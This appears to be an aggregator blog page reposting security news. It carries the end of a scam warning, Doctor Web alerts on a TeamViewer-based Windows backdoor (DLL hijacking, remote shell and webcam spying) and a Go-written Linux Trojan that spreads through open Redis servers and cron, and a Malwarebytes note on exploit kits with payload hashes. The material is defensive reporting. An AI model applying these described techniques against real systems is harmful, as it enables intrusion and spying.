Elsewhere, one of our clones expresses a love for the photography section of National Geographic.
We even found a whole platoon on Skype:
There are many more variations on this theme across the net, from social networking to random forum comments. The trick is to ignore / block / delete them all and go about your business. There are no secret millions waiting for you in Iraq, or anywhere else for that matter. Scammers are happy to play on the good reputation of your armed forces and convince you to indulge in a spot of “What could possibly go wrong”.
Unfortunately for anyone reeled in, the answer is “quite a lot, actually“.
Don’t fall for it.
Christopher Boyd
Feedly:Virus alerts. Doctor Web discovers backdoor targeting users in Russia, Great Britain, Spain, and the USA
from Virus alerts
August 15, 2016
The Trojan, named BackDoor.TeamViewerENT.1, is distributed under the name Spy-Agent, a name it shares with its system management interface. Cybercriminals have been developing this malware program since 2011 and regularly release modified versions of it. This article will focus on one such modification.
Like its counterpart BackDoor.TeamViewer.49, BackDoor.TeamViewerENT.1 is a multi-component Trojan. However, while its predecessor implemented TeamViewer only to upload a malicious library to an attacked computer’s memory, BackDoor.TeamViewerENT.1 uses this utility to spy on potential victims.
The Trojan’s main payload is placed into the avicap32.dll library, and its operation parameters are stored in an encrypted configuration block. BackDoor.TeamViewerENT.1 also saves the files and folders necessary for TeamViewer to operate, together with some additional files.
If a Windows program needs a dynamic library to be loaded in order to operate, the system starts searching for the file with that name in the same folder from which the program was run, and only then in the Windows system directory. Virus makers decided to take advantage of this Windows feature: TeamViewer needs a standard avicap32.dll library, which is stored in one of the default system catalogs. However, the Trojan stores a malicious library with that same name right in the folder with the original TeamViewer executable file, and, as a result, Windows loads the malicious library, rather than the legitimate one, into the memory.
Once launched, BackDoor.TeamViewerENT.1 disables error messaging for the TeamViewer process, appends its files and the TeamViewer files with the attributes “system”, “hidden”, and “read only”, and then intercepts calls for TeamViewer functions and calls for several system functions. If certain files or components are missing in order for TeamViewer to operate normally, the Trojan downloads them from its command and control (C&C) server. In addition, if BackDoor.TeamViewerENT.1 detects that the Windows Task Manager or Process Explorer has been launched, the Trojan terminates the TeamViewer process. When connected to the C&C server, the backdoor can perform the following functions:
- Restart the computer
- Turn off the computer
- Remove TeamViewer
- Relaunch TeamViewer
- Start listening through the microphone
- Stop listening through the microphone
- Identify the web camera
- Start viewing via the web camera
- Stop viewing via the web camera
- Download a file; then save it to a temporary folder and run it
- Update a configuration file and the backdoor’s executable file
- Connect to the specified remote server; and then run cmd.exe and execute input/output redirection to a remote server
Once executed, these commands provide cybercriminals with great opportunities to spy on users and steal their personal information. In particular, we know that virus makers have used this Trojan to install malware programs belonging to the Trojan.Keylogger and Trojan.PWS.Stealer families. In the course of their investigation, Doctor Web’s security researchers found out that the backdoor targets residents of particular countries and regions at different times. For example, in July, BackDoor.TeamViewerENT.1 attacked user computers in Europe, particularly in Great Britain and Spain, and, in August, cybercriminals shifted their focus to the USA.
Nevertheless, a large number of cases involving this Trojan were also registered in Russia:
Doctor Web specialists are keeping a close watch on this Trojan and recommend that users be more careful and update their virus databases in a timely manner. Dr.Web Anti-virus successfully detects and removes BackDoor.TeamViewerENT.1, so it does not pose any threat to Dr.Web users.
Feedly:Virus alerts. Doctor Web detected Linux Trojan written in Go
from Virus alerts
August 8, 2016
A Trojan, named Linux.Lady.1, can execute a limited range of actions such as to determine an external IP address of the infected computer, to attack other computers, and to download and launch a cryptocurrency mining software. Linux.Lady.1 is written in the Google developed programming language—Go. Although Doctor Web security researchers have already encountered Trojans written in Go, such malware programs are not frequently detected in the wild. The architecture of the Trojan consists of numerous libraries published on GitHub—the most popular collaborative application development service.
Once Linux.Lady.1 is launched, it sends the following information to the command and control server: the current Linux version and the name of the operating system family it belongs to, a number of CPUs, names and a number of running processes, and so on. The Trojan receives a configuration file necessary for downloading and launching of a cryptocurrency mining program in order to generate income which is then transferred to the cybercriminals’ e-wallet.
Linux.Lady.1 can also determine an external IP address of the infected computer using special websites, specified in the configuration file, and attack other computers of the network. The Trojan tries to connect to the remote servers via a port used by the Redis (remote dictionary server) data structure store, without entering a password in expectation that the system has not been configured correctly. If the connection is established, the malware adds a downloader script, named Linux.DownLoader.196, to the cron scheduler. The script downloads a copy of Linux.Lady.1 and installs it on the compromised host. Then the Trojan adds a key for connection to the computer over SSH protocol to the list of authorized keys.
Dr.Web for Linux successfully detects and removes Linux.Lady.1 and Linux.DownLoader.196, therefore, these malicious programs pose no threat to our users.
Feedly:Understanding Java Code and Malware | Malwarebytes Unpacked. Exploit kit shakedown: RIG EK grabs Neutrino EK campaigns
from Understanding Java Code and Malware | Malwarebytes Unpacked
Exploit kits are going through some strange phases these days. Two major malware distribution campaigns, namely Pseudo Darkleech and EITTest traditionally reserved for Neutrino EK were redirecting to underdog RIG EK. Several security researchers (Oddly_Normal, @malware_traffic, BroadAnalysis) pointed out this unexpected behaviour on Twitter.
Our telemetry records only show a few instances of Neutrino via what we earlier described on this blog as the jQueryGate while the fingerprinting pre-gate itself was nowhere near as active.
Time will tell if this is a temporary blip or not. While we have seen some switches between EKs in the past, the Pseudo Darkleech and EITest campaigns which were once part of Angler’s distribution channels, have always been very coveted.
We will keep monitoring this situation and update this post accordingly.
IOCs:
Payload from Pseudo Darkleech:
c4daadcbb525b96644f672025f3a4f3261a40a7b6250f3c726de3f4566cb6cf3
Payload from EITest:
446a639371b060de0b4edaa8789f101eaeae9388b6389b4c852cd8323ec6757c
RELATED ARTICLES
November 5, 2012 - In old times, a citadel was a fortress used as the last line of defense. For cyber criminals it is a powerful and state-of-the-art toolkit to both distribute malware and manage infected computers (bots). Citadel is an offspring of the (too) popular Zeus crimekit whose main goal is to steal banking credentials by capturing keystrokes...
January 2, 2013 - The majority of computers get infected from visiting a specially crafted webpage that exploits one or multiple software vulnerabilities. It could be by clicking a link within an email or simply browsing the net, and it happens silently without any user interaction whatsoever. Vulnerabilities are flaws that exist in various programs and that allow someone to...
January 14, 2013 - Update (1/14/2013) Oracle has issued an emergency patch to be shipped with version 7 update 11. While we are pleased to see a quick turnaround time, we stand by our initial recommendations to disable Java in your browser. This is still the most exploited piece of software and whether it is patched or not still unnecessarily puts you...
March 14, 2013 - Ransomware is still going strong and infecting countless PCs. We happened to stumble upon an interesting sample part of the Urausy family which bypassed detection on all major antivirus products for almost an entire day before slowly being detected. In this post we will give some information on its background (where it came from) and...
April 5, 2013 - Exploit Kit authors must really love Java . Not only is it ripe with vulnerabilities but its own language provides a great platform to write and deliver malware in different ways. We are used to seeing encrypted payloads (XOR, AES encryption), applets containing both the exploit itself and the binary payload. Today we will talk...
Subscribe to:
Posts (Atom)
